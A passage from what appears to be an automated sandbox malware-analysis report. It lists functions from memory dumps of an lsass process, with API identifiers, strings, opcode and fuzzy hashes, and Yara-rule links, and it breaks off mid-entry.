                                                                                • Instruction ID: a2d052cb6962f498e3cef9ed57c0a8daa6a62b61da821da8834fd8d960af75c0
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: D231B332741B5182EB26DF1BE5447A9A7A0FB4DBA4F2881209F4C47B75EF34C8A5C781
                                                                                Function 00000140AE86CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: b1e378f208745640ce80b78c559ffaa0a20b0e3a8eff5e4311b7b060cf634d78
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: F3112E3028534081FA66AB635A553A962416B9C7F4F344B24EE3E476FADE78DC01D6C3
                                                                                Function 00000140AE86199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 9022e9ca5b0b5f71c7b82a84b25e46de0569a46428ab685b711a92cff19137a4
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: A5015731740B4082EB51DB53A848799A3A1F78CBD1FA84035DF4D43B65DE38C989C781
                                                                                Function 00000140AE8636C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: 301de5e6a3bc59086d6f9150b82df67b6d6c22bbab0207dc7c03168e1951e1a1
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 01015774651B40C2EB269B23E81879973A0BB9DBA2F240428CF4D07774EF3CC908C782
                                                                                Function 00000140AE868FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: bd338bf40550659d0ab490f789d63c081b601061abea68a920c6aca0165ba548
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: 8351A13265170086EB16CB16E848B9937A6F348BA8F318524DF1A477E8DB3DCC41C782
                                                                                Function 00000140AE863044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 0e89825c8f5d70b27a483a01b8d98a85527b4973c2a0efa788cb30948269fb2a
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: A6F05E30644B8082EB058B53B9041996261AB8CFE0F245020EF4E07B78DE38C849C782
                                                                                Function 00000140AE86BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: 0a5f03d881548423950f550b58b8fc74d35f60bbb561fa5f685fc2d061d5bb49
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 7EF06D71655B0582EB128B26E8443A97320EB8CBB5F740219CF6E472F4CF3DC948D381
                                                                                Function 00000140AE8650D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction ID: 73fda85837acdd30ad006dc6ccb1667200e15de9212539d4e27f8f5c03466d3a
                                                                                • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                                • Instruction Fuzzy Hash: 2702FA32259B8486EB61DB56F49439AB7A1F7C8794F200415EB8E87BB8DF7CC844CB41
                                                                                Function 00000140AE865710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction ID: 819f4eb226d638b22eb9453569fbd0dff2ed878ae5cb7d9cc285f1354ad887c7
                                                                                • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                                • Instruction Fuzzy Hash: 9B61C536559B44C6E7629B16F48439AB7A0F7887A4F600515EF8E47BB8DF7CC840CB82
                                                                                Function 00000140AE874104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 28d524a13795f3523b3f1b4b207150eb2f338f5cab7179f9a4c1ef00b7941454
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: DC119132AD0B5011F667256AD4913E531446B6DBB8F390624AF7E176F68B34CC41C2A2
                                                                                Function 00000140ADFD3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 2e1910b8291bafd17102f3214c72d3e729590e13e78c3872cab4fc5f060f1e3e
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 22115472614B5353FA56162AE4553EB31C36F5C37CF784628AFE6076F68A34E8436200
                                                                                Function 00000140ADFCF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: 48ac8b7a938d00f4a24374fee49c64dd94bfb0dfea2bd827f35d3ab40a9a7452
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: 3961B43652234853FA6B8B67E5443EBBAA3EF8D748F744415CB46077B4DB34C967A200
                                                                                Function 00000140AE86AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 1c54ac8669fca167ed3fb4a5461af2b1e7039b1515757cf07daf6e620200d245
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: B6619F33640B848AEB11DF66D4403DD77A0F748BA8F244256EF4E17BA9DB38C995C781
                                                                                Function 00000140AE86AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 6cac39d5d8876cbc65fde025732dcd94be71c236f1742025846821184820e854
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: D951AF72180780CAEB768F17958439977A0F358BA8F244256DF9D47BE5CB38D890D782
                                                                                Function 00000140ADFCA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 5e9ed10956360af88f8a3a4b9cf73a15bede84b98f5d365089c0e3503e132e06
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: B751E432120388CBEB658B6794443DA37A3FB58B84F244117DB4947BE5CB39E5A2E700
                                                                                Function 00000140ADFC8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: 595c9e32b9df4e514150441d0aa3e925450171a8e5ef433ea7709e32150aded9
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: E551E43272170487DB96CF16D404BEA3797FB48BA8F318424DB06437A8EBB4C952A704
                                                                                Function 00000140ADFC83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: fdcdef5ba31d8dbb8912a9a905e6b67567b4155f9952f6a6302e3e1a43461dee
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 4831CF3122174487E792DF13E844BDA37A7FB48B98F258414EF8A037A8CB38C952D704
                                                                                Function 00000140AE872058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 4b0a4d86e2932106c0371b6ae4a27eadaf1a36e0bf94906de29ca74a04e3cc8d
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: 44D1D072B54B8089E712CFAAD5403EC3BB1F3587A8F244216CF5D97BA9DA34C946C381
                                                                                Function 00000140AE8614A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: e0938be913c4546f92e354b3f490316f5aad01bc8c73eed3b2a93003b4ccae50
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 4C015A32A40B90C6E706DF67E94828A77A1F78DFA1F244425EF4E4372ADE38C851C791
                                                                                Function 00000140AE872980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: bfe30e0d5e1943aced18828ddcaefd42f41aed77c308e3009ff5d43c7c6b682c
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: A491AFB264075085F762DF6A94803ED3BA4F758BA8F744109DF4E67AA5DB34CC82C782
                                                                                Function 00000140AE867960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: a5c049cb69e96cfbb56616fdcd891d3e75a6c1cb872cb67dafead8936c6c1fcc
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 28110632B50B018AEB008B61E8542A833A4F719768F540E21DF6D87BA4DF78C598D2C1
                                                                                Function 00000140ADFC9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: fd2f36d4469ca00d580b9035ee875e4ebab09abcf6c64778c8a765e7c8b01963
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: E9619F33610B888AEB21DF66D0403DE77B2FB48B89F244215EF4917BA8DB38D166D700
                                                                                Function 00000140AE862330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction ID: c9d078df74486e421dded553d044dc307dfc5948a87b49d5b9b062cc3c97baf6
                                                                                • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                • Instruction Fuzzy Hash: EE51E03228438181E676DB2FA1583EAA791F3CD7A4F640165DF4D03BAADA39CD44C7C2
                                                                                Function 00000140AE8726F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: 3e73605a521e4cce57338457d13aec77e0fda4a33a28f7c4ac6780cba42ba59d
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 48417172615B8086DB219F6AE8443E977A1F7987A4F604025EF4D87BA4DB3CC941C781
                                                                                Function 00000140AE8694A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: c81f436458b37827e035cf8ccd5af5f126ed8c86e3896386e64a1e0766a3eb38
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: D7112B32614B8082EB628B16E44439977E5F788BA8F684260EF8C077A9DF3CC955CB40
                                                                                Function 00000140ADFC7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 56ed09fddae288ef6c89d74bd241d2dfe88a9543861981f92f91ccf0ba0ae745
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: DCE08671650B4892DF038F22E8402D933A3DF5DB68B9891229A5C07321FA38D1FAD301
                                                                                Function 00000140ADFC73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3377815584.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 4940423c840106aa278dadeec7b987efc7fd2bbde3a41644df2d62b25ed6cadf
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 05E08671610B4886DF028F22E4401D97363EF5DB58B989122CA4C07321FA38D1E6D300
                                                                                Function 00000140AE861BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001B.00000002.3386134452.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_27_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 65c83ae18bbeee38c1f395d24bd21a894001158fe5ba6808c8c40ff99673c146
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 0F119E35A41B5485EB46DB6BA8082A977A1FB8DFE0F284028DF4D47776DF38C842D381
                                                                                Function 00000140AE861268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
